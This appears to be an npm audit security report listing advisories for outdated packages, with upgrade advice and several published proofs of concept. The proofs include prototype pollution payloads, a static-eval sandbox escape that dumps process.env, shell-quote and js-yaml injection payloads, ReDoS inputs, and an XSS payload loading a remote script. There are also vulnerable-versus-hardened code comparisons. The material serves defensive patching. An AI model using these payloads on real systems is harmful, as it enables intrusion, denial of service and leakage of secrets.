Security Alert: [low] [braces]
Type: Regular Expression Denial of Service
Advisory Version: <2.3.1
Current version: 1.8.5
Recommendation: Upgrade to version 2.3.1 or higher.
Url: https://npmjs.com/advisories/786
Detail: Versions of `braces` prior to 2.3.1 are vulnerable to Regular Expression Denial of Service (ReDoS). Untrusted input may cause catastrophic backtracking while matching regular expressions. This can make the application unresponsive, leading to Denial of Service.

Security Alert: [high] [cryptiles]
Type: Insufficient Entropy
Advisory Version: >=3.1.0 <3.1.3 || >=4.0.0 <4.1.2
Current version: 3.1.2
Recommendation: Update to version 3.1.3 or 4.1.2 or later.
Url: https://npmjs.com/advisories/720
Detail: Versions of `cryptiles` from 3.1.0 through 3.1.2, and from 4.0.0 through 4.1.1, are vulnerable to insufficient entropy. The `randomDigits` method generates digits that are not uniformly distributed over enough attempts.

Security Alert: [low] [deep-extend]
Type: Prototype Pollution
Advisory Version: <=0.5.0
Current version: 0.4.2
Recommendation: Update to version 0.5.1 or later.
Url: https://npmjs.com/advisories/612
Detail: Versions of `deep-extend` before 0.5.1 are vulnerable to prototype pollution.

Security Alert: [high] [fstream]
Type: Arbitrary File Overwrite
Advisory Version: <1.0.12
Current version: 1.0.11
Recommendation: Upgrade to version 1.0.12 or later.
Url: https://npmjs.com/advisories/886
Detail: Versions of `fstream` prior to 1.0.12 are vulnerable to Arbitrary File Overwrite. Extracting a tarball that contains a hardlink to a file that already exists on the system, followed by a file entry that matches the hardlink, will overwrite the system's file with the contents of the extracted file. The `fstream.DirWriter()` function is vulnerable.

Security Alert: [high] [handlebars]
Type: Prototype Pollution
Advisory Version: <=4.0.13 || >=4.1.0 <4.1.2
Current version: 4.0.11
Recommendation: For handlebars 4.1.x upgrade to 4.1.2 or later.
For handlebars 4.0.x upgrade to 4.0.14 or later.
Url: https://npmjs.com/advisories/755
Detail: Versions of `handlebars` prior to 4.0.14 are vulnerable to Prototype Pollution. Templates may alter an object's prototype, allowing an attacker to execute arbitrary code on the server.

Security Alert: [moderate] [hoek]
Type: Prototype Pollution
Advisory Version: <=4.2.0 || >=5.0.0 <5.0.3
Current version: 2.16.3
Recommendation: Update to version 4.2.1, 5.0.3 or later.
Url: https://npmjs.com/advisories/566
Detail: Versions of `hoek` prior to 4.2.1 and 5.0.3 are vulnerable to prototype pollution. The `merge` function, and the `applyToDefaults` and `applyToDefaultsWithShallow` functions which use `merge` behind the scenes, are vulnerable to a prototype pollution attack when given an _unvalidated_ payload created from a JSON string containing the `__proto__` property. This can be demonstrated like so:

```javascript
var Hoek = require('hoek');

// JSON.parse keeps "__proto__" as an own key of the parsed object;
// a vulnerable merge then walks into Object.prototype.
var malicious_payload = '{"__proto__":{"oops":"It works !"}}';

var a = {}; // an unrelated object, never touched directly
console.log("Before : " + a.oops);
Hoek.merge({}, JSON.parse(malicious_payload));
console.log("After : " + a.oops); // "It works !" on vulnerable versions
```

This type of attack can be used to overwrite existing properties, causing a potential denial of service.

Security Alert: [high] [js-yaml]
Type: Code Injection
Advisory Version: <3.13.1
Current version: 3.10.0
Recommendation: Upgrade to version 3.13.1.
Url: https://npmjs.com/advisories/813
Detail: Versions of `js-yaml` prior to 3.13.1 are vulnerable to Code Injection. The `load()` function may execute arbitrary code injected through a malicious YAML file. Objects that have `toString` as key, JavaScript code as value, and are used as explicit mapping keys allow attackers to execute the supplied code through the `load()` function. The `safeLoad()` function is unaffected.
An example payload is `{ toString: !<tag:yaml.org,2002:js/function> 'function (){return Date.now()}' } : 1`, which returns the object `{ "1553107949161": 1 }` (the key is whatever `Date.now()` returned when the injected function ran).

Security Alert: [moderate] [js-yaml]
Type: Denial of Service
Advisory Version: <3.13.0
Current version: 3.10.0
Recommendation: Upgrade to version 3.13.0.
Url: https://npmjs.com/advisories/788
Detail: Versions of `js-yaml` prior to 3.13.0 are vulnerable to Denial of Service. By parsing a carefully crafted YAML file, the node process stalls and may exhaust system resources, leading to a Denial of Service.

Security Alert: [moderate] [lodash]
Type: Prototype Pollution
Advisory Version: <4.17.11
Current version: 4.17.4
Recommendation: Update to version 4.17.11 or later.
Url: https://npmjs.com/advisories/782
Detail: Versions of `lodash` before 4.17.11 are vulnerable to prototype pollution. The vulnerable functions are `defaultsDeep`, `merge`, and `mergeWith`, which allow a malicious user to modify the prototype of `Object` via `{constructor: {prototype: {...}}}`, causing the addition or modification of a property that will then exist on all objects.

Security Alert: [low] [lodash]
Type: Prototype Pollution
Advisory Version: <4.17.5
Current version: 4.17.4
Recommendation: Update to version 4.17.5 or later.
Url: https://npmjs.com/advisories/577
Detail: Versions of `lodash` before 4.17.5 are vulnerable to prototype pollution. The vulnerable functions are `defaultsDeep`, `merge`, and `mergeWith`, which allow a malicious user to modify the prototype of `Object` via `__proto__`, causing the addition or modification of a property that will then exist on all objects.

Security Alert: [low] [merge]
Type: Prototype Pollution
Advisory Version: <=1.2.0
Current version: 1.2.0
Recommendation: Update to version 1.2.1 or later.
Url: https://npmjs.com/advisories/722
Detail: Versions of `merge` before 1.2.1 are vulnerable to prototype pollution.
The `merge.recursive` function can be tricked into adding or modifying properties of the Object prototype.

Security Alert: [low] [randomatic]
Type: Cryptographically Weak PRNG
Advisory Version: <3.0.0
Current version: 1.1.7
Recommendation: Update to version 3.0.0 or later.
Url: https://npmjs.com/advisories/157
Detail: Affected versions of `randomatic` generate random values using a cryptographically weak pseudo-random number generator. This may result in predictable values instead of the random values intended.

Security Alert: [high] [sshpk]
Type: Regular Expression Denial of Service
Advisory Version: <1.13.2 || >=1.14.0 <1.14.1
Current version: 1.13.1
Recommendation: Update to version 1.13.2, 1.14.1 or later.
Url: https://npmjs.com/advisories/606
Detail: Versions of `sshpk` before 1.13.2 or 1.14.1 are vulnerable to regular expression denial of service when parsing crafted invalid public keys.

Security Alert: [moderate] [stringstream]
Type: Out-of-bounds Read
Advisory Version: <=0.0.5
Current version: 0.0.5
Recommendation: No fix is currently available for this vulnerability. It is our recommendation to not install or use this module if user input is being passed in to `stringstream`.
Url: https://npmjs.com/advisories/664
Detail: All versions of `stringstream` are vulnerable to out-of-bounds read, as the module allocates uninitialized Buffers when a number is passed in on the input stream on Node.js 4.x and below.

Security Alert: [high] [tar]
Type: Arbitrary File Overwrite
Advisory Version: <2.2.2 || >=3.0.0 <4.4.2
Current version: 2.2.1
Recommendation: For tar 4.x, upgrade to version 4.4.2 or later. For tar 2.x, upgrade to version 2.2.2 or later.
Url: https://npmjs.com/advisories/803
Detail: Versions of `tar` prior to 4.4.2 for 4.x and 2.2.2 for 2.x are vulnerable to Arbitrary File Overwrite.
Extracting a tarball that contains a hardlink to a file that already exists on the system, followed by a file entry that matches the hardlink, will overwrite the system's file with the contents of the extracted file.

Security Alert: [high] [cached-path-relative]
Type: Prototype Pollution
Advisory Version: <=1.0.1
Current version: 1.0.1
Recommendation: Update to version 1.0.2 or later.
Url: https://npmjs.com/advisories/739
Detail: Versions of `cached-path-relative` before 1.0.2 are vulnerable to prototype pollution.

Security Alert: [moderate] [concat-stream]
Type: Memory Exposure
Advisory Version: >=1.3.0 <1.3.2 || >=1.4.0 <1.4.11 || >=1.5.0 <1.5.2
Current version: 1.5.0
Recommendation: Update to version 1.5.2, 1.4.11, 1.3.2 or later. If you are unable to update, make sure user-provided input passed into the `write()` function is never a number.
Url: https://npmjs.com/advisories/597
Detail: Versions of `concat-stream` before 1.5.2 are vulnerable to memory exposure if user-provided input is passed into `write()`. Versions <1.3.0 are not affected because they do not use the unguarded Buffer constructor.

Security Alert: [low] [debug]
Type: Regular Expression Denial of Service
Advisory Version: <=2.6.8 || >=3.0.0 <=3.0.1
Current version: 0.7.4
Recommendation: Version 2.x.x: Update to version 2.6.9 or later. Version 3.x.x: Update to version 3.1.0 or later.
Url: https://npmjs.com/advisories/534
Detail: Affected versions of `debug` are vulnerable to regular expression denial of service when untrusted user input is passed into the `o` formatter. As it takes 50,000 characters to block the event loop for 2 seconds, this is a low severity issue.

Security Alert: [critical] [growl]
Type: Command Injection
Advisory Version: <1.10.2
Current version: 1.9.2
Recommendation: Update to version 1.10.2 or later.
Url: https://npmjs.com/advisories/146
Detail: Affected versions of `growl` do not properly sanitize input prior to passing it into a shell command, allowing arbitrary command execution.
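The prototype pollution entries above (deep-extend, handlebars, hoek, lodash, merge, cached-path-relative) all come down to a recursive merge that follows `__proto__` or `constructor.prototype` from a parsed JSON payload into `Object.prototype`. The following is an added example, not code from any of those packages: a minimal merge with the bug beside a hardened one, run against constructed payloads for both vectors named in the two lodash advisories. `Object.prototype` is cleaned up before the demonstration returns.

```javascript
// Added example, not code from hoek, lodash, deep-extend, merge or
// cached-path-relative. Payloads are constructed for illustration.

// Vulnerable: recurses into every key of the source, including "__proto__"
// and "constructor", so a parsed JSON payload can reach Object.prototype.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value !== null && typeof value === 'object') {
      const existing = target[key];
      // Treats functions as mergeable too, which is how the
      // {constructor: {prototype: ...}} vector gets through.
      if (existing === null || (typeof existing !== 'object' && typeof existing !== 'function')) {
        target[key] = {};
      }
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened: never walk the prototype chain, and only descend into the
// target's own plain-object properties.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (value !== null && typeof value === 'object') {
      const own = Object.prototype.hasOwnProperty.call(target, key) ? target[key] : undefined;
      if (own === null || typeof own !== 'object') target[key] = {};
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Run both payloads through both merges and report what an unrelated object
// sees afterwards. Object.prototype is restored before returning.
function demonstrate() {
  const payloads = [
    '{"__proto__":{"oops":"It works !"}}',             // hoek / deep-extend / merge vector
    '{"constructor":{"prototype":{"polluted":true}}}', // lodash 4.17.5-4.17.10 vector
  ];
  const result = {};
  for (const [name, merge] of [['unsafe', unsafeMerge], ['safe', safeMerge]]) {
    const victim = {}; // created before the merge, never touched directly
    for (const json of payloads) merge({}, JSON.parse(json));
    result[name] = { viaProto: victim.oops, viaConstructor: victim.polluted };
    delete Object.prototype.oops;
    delete Object.prototype.polluted;
  }
  return result;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demonstrate(), null, 2));
}
```

The hardened version is the shape of the upstream fixes: skip the three keys that lead to the prototype chain, and only recurse into properties the target actually owns. Building the target with `Object.create(null)` is a further option when the merged object is never used as a prototype.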
Security Alert: [moderate] [mime]
Type: Regular Expression Denial of Service
Advisory Version: <1.4.1 || >2.0.0 <2.0.3
Current version: 1.3.6
Recommendation: Update to version 1.4.1 (1.x) or 2.0.3 (2.x) or later.
Url: https://npmjs.com/advisories/535
Detail: Affected versions of `mime` are vulnerable to regular expression denial of service when a mime lookup is performed on untrusted user input.

Security Alert: [high] [parsejson]
Type: Regular Expression Denial of Service
Advisory Version: <=0.0.3
Current version: 0.0.3
Recommendation: The `parsejson` package has not been functionally updated since it was initially released. Additionally, it provides functionality which is natively included in Node.js, so the native `JSON.parse()` should be used instead, for both performance and security reasons.
Url: https://npmjs.com/advisories/528
Detail: Affected versions of `parsejson` are vulnerable to regular expression denial of service when parsing untrusted user input.

Security Alert: [moderate] [static-eval]
Type: Sandbox Breakout / Arbitrary Code Execution
Advisory Version: <=2.0.1
Current version: 0.2.4
Recommendation: Upgrade to version 2.0.2 or later.
Url: https://npmjs.com/advisories/758
Detail: Versions of `static-eval` prior to 2.0.2 pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.

## Proof of concept

```javascript
var evaluate = require('static-eval');
var parse = require('esprima').parse;

// Reaches the Function constructor through the native String.prototype.sub
// supplied as a context value, then calls the constructed function.
var payload = '(function({x}){return x.constructor})({x:"".sub})("console.log(process.env)")()';
var ast = parse(payload).body[0].expression;
console.log(evaluate(ast, {x:1}));
```

Security Alert: [moderate] [static-eval]
Type: Sandbox Breakout / Arbitrary Code Execution
Advisory Version: <=1.1.1
Current version: 0.2.4
Recommendation: Update to version 2.0.0 or later.
Url: https://npmjs.com/advisories/548
Detail: Affected versions of `static-eval` pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.

## Proof of concept

```javascript
var evaluate = require('static-eval');
var parse = require('esprima').parse;

var src = '(function(){console.log(process.pid)})()';
var ast = parse(src).body[0].expression;
var res = evaluate(ast, {}); // Will print the process id
```

Security Alert: [high] [tough-cookie]
Type: Regular Expression Denial of Service
Advisory Version: <2.3.3
Current version: 2.3.2
Recommendation: Update to version 2.3.3 or later.
Url: https://npmjs.com/advisories/525
Detail: Affected versions of `tough-cookie` are susceptible to regular expression denial of service. The amplification of this vulnerability is relatively low: it takes around 2 seconds for the engine to execute on a malicious input 50,000 characters in length. If node was compiled with a larger `-DHTTP_MAX_HEADER_SIZE`, however, the impact can be significant, since the primary limit on the vulnerability is node's default maximum HTTP header length.

Security Alert: [moderate] [tunnel-agent]
Type: Memory Exposure
Advisory Version: <0.6.0
Current version: 0.4.3
Recommendation: Update to version 0.6.0 or later.
Url: https://npmjs.com/advisories/598
Detail: Versions of `tunnel-agent` before 0.6.0 are vulnerable to memory exposure. This is exploitable if user-supplied input is provided as the `auth` value and is a number.

Proof-of-concept:

```js
require('request')({
  method: 'GET',
  uri: 'http://www.example.com',
  tunnel: true,
  proxy: {
    protocol: 'http:',
    host: '127.0.0.1',
    port: 8080,
    auth: USERSUPPLIEDINPUT // a number here is treated as a buffer size
  }
});
```

Security Alert: [high] [ws]
Type: Denial of Service
Advisory Version: <1.1.5 || >=2.0.0 <3.3.1
Current version: 1.1.2
Recommendation: Update to version 1.1.5 (1.x) or 3.3.1 or later.
Url: https://npmjs.com/advisories/550
Detail: Affected versions of `ws` can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent.

## Proof of concept

```javascript
const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor'; // or ',;constructor'
  // Raw upgrade request with the crafted extensions header.
  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});
```

Security Alert: [high] [https-proxy-agent]
Type: Denial of Service
Advisory Version: <=2.1.1
Current version: 1.0.0
Recommendation: Update to version 2.2.0 or later.
Url: https://npmjs.com/advisories/593
Detail: Versions of `https-proxy-agent` before 2.2.0 are vulnerable to denial of service, because the unsanitized `proxy.auth` option is passed to `Buffer()`.

Security Alert: [moderate] [axios]
Type: Denial of Service
Advisory Version: <0.18.1
Current version: 0.18.0
Recommendation: Upgrade to 0.18.1 or later.
Url: https://npmjs.com/advisories/880
Detail: Versions of `axios` prior to 0.18.1 are vulnerable to Denial of Service. If a response exceeds the `maxContentLength` property, the package prints an error but does not stop the request. This may cause high CPU usage and lead to Denial of Service.

Security Alert: [high] [base64-url]
Type: Out-of-bounds Read
Advisory Version: <2.0.0
Current version: 1.2.1
Recommendation: Update to version 2.0.0 or later.
Url: https://npmjs.com/advisories/660
Detail: Versions of `base64-url` before 2.0.0 are vulnerable to out-of-bounds read, as the module allocates uninitialized Buffers when a number is passed as input.
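The memory exposure and out-of-bounds read entries (stringstream, concat-stream, tunnel-agent, https-proxy-agent, base64-url) share one root cause: a value that should have been a string reaches the old `Buffer()` constructor as a number, which that constructor took as a size, handing back that many bytes of whatever the process had in memory. The following is an added example, not code from any of those packages. It reproduces the legacy behaviour with `Buffer.allocUnsafe` (on current Node `new Buffer(n)` is deprecated and zero-filled, so it no longer shows the leak) and puts the guard the fixes introduced beside it. The JSON inputs are constructed.

```javascript
// Added example, not code from concat-stream, tunnel-agent, https-proxy-agent,
// base64-url or stringstream. Inputs are constructed for illustration.

// What the vulnerable versions did: a number reaching Buffer() was taken as a
// *size*, returning that many bytes of uninitialised process memory.
// Buffer.allocUnsafe reproduces that on current Node.
function legacyToBuffer(input) {
  if (typeof input === 'number') return Buffer.allocUnsafe(input);
  return Buffer.from(String(input));
}

// Hardened: accept only strings and Buffers and build through Buffer.from,
// which never returns uninitialised memory. A number is rejected instead of
// being reinterpreted as a length.
function safeToBuffer(input) {
  if (Buffer.isBuffer(input)) return input;
  if (typeof input !== 'string') {
    throw new TypeError('expected string or Buffer, got ' + typeof input);
  }
  return Buffer.from(input, 'utf8');
}

// A caller in the shape of the tunnel-agent / https-proxy-agent advisories:
// the auth value comes from untrusted JSON and ends up in a header.
function proxyAuthHeader(untrustedJson, toBuffer) {
  const auth = JSON.parse(untrustedJson).auth;
  return 'Basic ' + toBuffer(auth).toString('base64');
}

// Number of raw bytes that would be sent behind the header above.
function rawBytesBehind(untrustedJson, toBuffer) {
  return toBuffer(JSON.parse(untrustedJson).auth).length;
}

const HONEST_INPUT = '{"auth":"user:pass"}'; // constructed
const HOSTILE_INPUT = '{"auth":65536}';       // constructed: a number, not a string

if (typeof require !== 'undefined' && require.main === module) {
  console.log(rawBytesBehind(HONEST_INPUT, legacyToBuffer), 'bytes for the honest input');
  console.log(rawBytesBehind(HOSTILE_INPUT, legacyToBuffer), 'bytes of process memory behind the hostile input (legacy path)');
  try {
    proxyAuthHeader(HOSTILE_INPUT, safeToBuffer);
  } catch (e) {
    console.log('hardened path rejected it:', e.message);
  }
}
```

The size is attacker-chosen and the bytes go out on the wire, which is why `request` and `tunnel-agent` ranked this as remote memory disclosure rather than a crash. A type check at the boundary is the whole fix; `Buffer.alloc`/`Buffer.from` only matter once the type is known.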
Security Alert: [low] [cli]
Type: Arbitrary File Write
Advisory Version: <1.0.0
Current version: 0.6.6
Recommendation: Update to version 1.0.0 or later.
Url: https://npmjs.com/advisories/95
Detail: Affected versions of `cli` use predictable temporary file names. If an attacker can create a symbolic link at the location of one of these temporary file names, the attacker can write to any file that the user running the `cli` process has permission to write to.

## Proof of Concept

By creating symbolic links at the following locations, the target of the link can be written to.

```
lock_file = '/tmp/' + cli.app + '.pid',
log_file  = '/tmp/' + cli.app + '.log';
```

Security Alert: [high] [fresh]
Type: Regular Expression Denial of Service
Advisory Version: <0.5.2
Current version: 0.3.0
Recommendation: Update to version 0.5.2 or later.
Url: https://npmjs.com/advisories/526
Detail: Affected versions of `fresh` are vulnerable to regular expression denial of service when parsing specially crafted user input.

Security Alert: [high] [method-override]
Type: Regular Expression Denial of Service
Advisory Version: <=1.0.2 || >2.0.0 <2.3.10
Current version: 2.3.9
Recommendation: Update to version 2.3.10 or later.
Url: https://npmjs.com/advisories/538
Detail: Affected versions of `method-override` are vulnerable to regular expression denial of service when untrusted user input is passed in the `X-HTTP-Method-Override` header.

Security Alert: [high] [minimatch]
Type: Regular Expression Denial of Service
Advisory Version: <=3.0.1
Current version: 0.3.0
Recommendation: Update to version 3.0.2 or later.
Url: https://npmjs.com/advisories/118
Detail: Affected versions of `minimatch` are vulnerable to regular expression denial of service attacks when user input is passed into the `pattern` argument of `minimatch(path, pattern)`.
## Proof of Concept

```javascript
var minimatch = require("minimatch");

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

var exploit = "[!" + genstr(1000000, "\\") + "A"; // minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
```

Security Alert: [moderate] [morgan]
Type: Code Injection
Advisory Version: <=1.9.0
Current version: 1.6.1
Recommendation: Update to version 1.9.1 or later.
Url: https://npmjs.com/advisories/736
Detail: Versions of `morgan` before 1.9.1 are vulnerable to code injection when user input is allowed into the filter, or when combined with a prototype pollution attack.

Security Alert: [high] [negotiator]
Type: Regular Expression Denial of Service
Advisory Version: <=0.6.0
Current version: 0.5.3
Recommendation: Update to version 0.6.1 or later.
Url: https://npmjs.com/advisories/106
Detail: Affected versions of `negotiator` are vulnerable to regular expression denial of service attacks, which trigger upon parsing a specially crafted `Accept-Language` header value.

Security Alert: [critical] [shell-quote]
Type: Potential Command Injection
Advisory Version: <=1.6.0
Current version: 0.0.1
Recommendation: Update to version 1.6.1 or later.
Url: https://npmjs.com/advisories/117
Detail: Affected versions of `shell-quote` do not properly escape command line arguments, which may result in command injection if the library is used to escape user input destined for use as command line arguments.

## Proof of Concept:

The following characters are not escaped properly: `>`, `;`, `{`, `}`. Bash has a neat but not well known feature known as "Bash Brace Expansion", wherein a sub-command can be executed without spaces by running it between a set of `{}` and using `,` instead of a space to separate arguments.
Because of this, full command injection is possible even though it was initially thought to be impossible.

```javascript
const quote = require('shell-quote').quote;
console.log(quote(['a;{echo,test,123,234}']));
// Actual:                "a;{echo,test,123,234}"
// Expected:              "a\;\{echo,test,123,234\}"
// Functional equivalent: "a; echo 'test' '123' '234'"
```

Security Alert: [low] [uglify-js]
Type: Regular Expression Denial of Service
Advisory Version: <2.6.0
Current version: 2.4.17
Recommendation: Update to version 2.6.0 or later.
Url: https://npmjs.com/advisories/48
Detail: Versions of `uglify-js` prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the `parse()` method.

### Proof of Concept

```javascript
var u = require('uglify-js');

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

// The length of the digit run is taken from the command line (see Results).
u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;");
```

### Results

```
$ time node test.js 10000
real 0m1.091s
user 0m1.047s
sys  0m0.039s

$ time node test.js 80000
real 0m6.486s
user 0m6.229s
sys  0m0.094s
```

Security Alert: [low] [uglify-js]
Type: Incorrect Handling of Non-Boolean Comparisons During Minification
Advisory Version: <=2.4.23
Current version: 2.4.17
Recommendation: Upgrade UglifyJS to version >=2.4.24.
Url: https://npmjs.com/advisories/39
Detail: Versions of `uglify-js` prior to 2.4.24 are affected by a vulnerability which may cause crafted JavaScript to have altered functionality after minification.

Security Alert: [moderate] [underscore.string]
Type: Regular Expression Denial of Service
Advisory Version: <=3.3.4
Current version: 2.2.1
Recommendation: Upgrade to version 3.3.5 or higher.
Url: https://npmjs.com/advisories/745
Detail: Versions of `underscore.string` prior to *3.3.5* are vulnerable to Regular Expression Denial of Service (ReDoS). The function `unescapeHTML` is vulnerable to ReDoS due to an overly broad regex.
The slowdown is approximately 2s for 50,000 characters but grows exponentially with larger inputs.

Security Alert: [high] [puppeteer]
Type: Use-After-Free
Advisory Version: <1.13.0
Current version: 1.10.0
Recommendation: Upgrade to version 1.13.0 or later.
Url: https://npmjs.com/advisories/824
Detail: Versions of `puppeteer` prior to 1.13.0 bundle a Chromium affected by the Use-After-Free vulnerability CVE-2019-5786. The Chromium FileReader API is vulnerable to Use-After-Free, which may lead to Remote Code Execution.

Security Alert: [high] [adm-zip]
Type: Arbitrary File Write via Archive Extraction
Advisory Version: <0.4.9
Current version: 0.4.7
Recommendation: Update to version 0.4.9 or later.
Url: https://npmjs.com/advisories/681
Detail: Versions of `adm-zip` before 0.4.9 are vulnerable to arbitrary file write when used to extract a specifically crafted archive that contains path traversal filenames (`../../file.txt` for example).

Security Alert: [low] [connect]
Type: methodOverride Middleware Reflected Cross-Site Scripting
Advisory Version: <=2.8.0
Current version: 2.4.6
Recommendation: Update to the newest version of Connect or disable methodOverride. It is not possible to avoid the vulnerability if you have enabled this middleware at the top of your stack.
Url: https://npmjs.com/advisories/3
Detail: Connect is a stack of middleware that is executed in order for each request. The "methodOverride" middleware allows an HTTP POST to override the method of the request with the value of the "_method" post key or of the "x-http-method-override" header. Because the user-supplied value was not checked, req.method could contain any kind of value. Because req.method did not match any common method verb, connect answered with a 404 page containing the "Cannot `[method]` `[url]`" content. The method was not properly encoded for output in the browser.
### Example:

```
~ curl "localhost:3000" -d "_method=<script src=http://nodesecurity.io/xss.js></script>"
Cannot <SCRIPT SRC=HTTP://NODESECURITY.IO/XSS.JS></SCRIPT> /
```

Security Alert: [moderate] [hawk]
Type: Regular Expression Denial of Service
Advisory Version: <3.1.3 || >=4.0.0 <4.1.1
Current version: 2.3.1
Recommendation: Update to hawk version 4.1.1 or later.
Url: https://npmjs.com/advisories/77
Detail: Versions of `hawk` prior to 3.1.3, or 4.x prior to 4.1.1, are affected by a regular expression denial of service vulnerability related to excessively long headers and URIs.

Security Alert: [critical] [open]
Type: Command Injection
Advisory Version: <=0.0.5
Current version: 0.0.5
Recommendation: The `open` package name is now carried by the (formerly `opn`) package, which has a very different API. Upgrading to the latest version will prevent this vulnerability but is likely to have unwanted effects because of that API change.
Url: https://npmjs.com/advisories/663
Detail: Versions of `open` before 6.0.0 are vulnerable to command injection when unsanitized user input is passed in. The package does come with the following warning in the readme:

```
The same care should be taken when calling open as if you were calling child_process.exec directly. If it is an executable it will run in a new shell.
```

Security Alert: [high] [qs]
Type: Denial-of-Service Memory Exhaustion
Advisory Version: <1.0.0
Current version: 0.5.1
Recommendation: Update to version 1.0.0 or later.
Url: https://npmjs.com/advisories/29
Detail: Versions prior to 1.0 of `qs` are affected by a denial of service condition. This condition is triggered by parsing a crafted string that deserializes into very large sparse arrays, resulting in the process running out of memory and eventually crashing.
Security Alert: [moderate] [request]
Type: Remote Memory Exposure
Advisory Version: >=2.2.6 <2.47.0 || >2.51.0 <=2.67.0
Current version: 2.9.203
Recommendation: Update to version 2.68.0 or later.
Url: https://npmjs.com/advisories/309
Detail: Affected versions of `request` will disclose local system memory to remote systems in certain circumstances. When a multipart request is made and the type of `body` is `number`, a buffer of that size is allocated and sent to the remote server as the body.

## Proof of Concept

```javascript
var request = require('request');
var http = require('http');

// Local server that logs whatever body the client sends.
var serveFunction = function (req, res) {
  req.on('data', function (data) { console.log(data); });
  res.end();
};
var server = http.createServer(serveFunction);
server.listen(8000);

// A numeric multipart body: vulnerable versions allocate an uninitialised
// 500-byte buffer and send its contents.
request({
  method: "POST",
  uri: 'http://localhost:8000',
  multipart: [{ body: 500 }]
}, function (err, res, body) {});
```

Security Alert: [moderate] [semver]
Type: Regular Expression Denial of Service
Advisory Version: <4.3.2
Current version: 1.0.14
Recommendation: Update to version 4.3.2 or later.
Url: https://npmjs.com/advisories/31
Detail: Versions 4.3.1 and earlier of `semver` are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.

Security Alert: [low] [send]
Type: Root Path Disclosure
Advisory Version: <0.11.1
Current version: 0.0.4
Recommendation: Update to version 0.11.1 or later.
Url: https://npmjs.com/advisories/56
Detail: Versions of `send` prior to 0.11.1 are affected by an information leakage vulnerability which may allow an attacker to enumerate paths on the server filesystem.

Security Alert: [low] [send]
Type: Directory Traversal
Advisory Version: <0.8.4
Current version: 0.0.4
Recommendation: Update to version 0.8.4 or later.
Url: https://npmjs.com/advisories/32
Detail: Versions 0.8.3 and earlier of `send` are affected by a directory traversal vulnerability.
When relying on the root option to restrict file access, it may be possible for an application consumer to escape the restricted directory and access files in a similarly named directory. For example, `static(__dirname + '/public')` would allow access to `__dirname + '/public-restricted'`.

Security Alert: [low] [timespan]
Type: Regular Expression Denial of Service
Advisory Version: <=99.999.99999
Current version: 2.3.0
Recommendation: No direct patch is available for this vulnerability. Currently, the best available solution is to use a functionally equivalent alternative package. It is also sufficient to ensure that user input is not passed into `timespan`, or that the maximum length of such user input is drastically reduced. Limiting the input length to 150 characters should be sufficient in most cases.
Url: https://npmjs.com/advisories/533
Detail: Affected versions of `timespan` are vulnerable to regular expression denial of service when parsing dates. The amplification for this vulnerability is significant, with 50,000 characters blocking the event loop for around 10 seconds.

Security Alert: [high] [url-parse]
Type: Open Redirect
Advisory Version: <1.4.3
Current version: 1.0.5
Recommendation: Update to version 1.4.3 or later.
Url: https://npmjs.com/advisories/678
Detail: Versions of `url-parse` before 1.4.3 return the wrong hostname, which could lead to Open Redirect, Server Side Request Forgery (SSRF), or authentication bypass vulnerabilities.

Security Alert: [high] [webpack-dev-server]
Type: Missing Origin Validation
Advisory Version: <2.11.4 || >=3.0.0 <=3.1.10
Current version: 1.16.5
Recommendation: For `webpack-dev-server` 2.x update to version 2.11.4 or later. For `webpack-dev-server` 3.x update to version 3.1.11 or later.
Url: https://npmjs.com/advisories/725
Detail: Versions of `webpack-dev-server` before 3.1.11 (and 2.x before 2.11.4) are missing origin validation on the websocket server.
This vulnerability allows a remote attacker to steal a developer's source code, because the origin of requests to the websocket server used for Hot Module Replacement (HMR) is not validated.

Security Alert: [moderate] [brace-expansion]
Type: ReDoS
Advisory Version: <=1.1.6
Current version: 1.1.6
Recommendation: Update to version 1.1.7 or later.
Url: https://npmjs.com/advisories/338
Detail: Affected versions of `brace-expansion` are vulnerable to a regular expression denial of service condition.

## Proof of Concept

```javascript
var expand = require('brace-expansion');
expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}');
```

Security Alert: [moderate] [marked]
Type: Regular Expression Denial of Service
Advisory Version: >=0.3.14 <0.6.2
Current version: 0.5.2
Recommendation: Upgrade to version 0.6.2 or later.
Url: https://npmjs.com/advisories/812
Detail: Versions of `marked` from 0.3.14 up to but not including 0.6.2 are vulnerable to Regular Expression Denial of Service. Email addresses may be evaluated in quadratic time, allowing attackers to crash the node process through resource exhaustion.
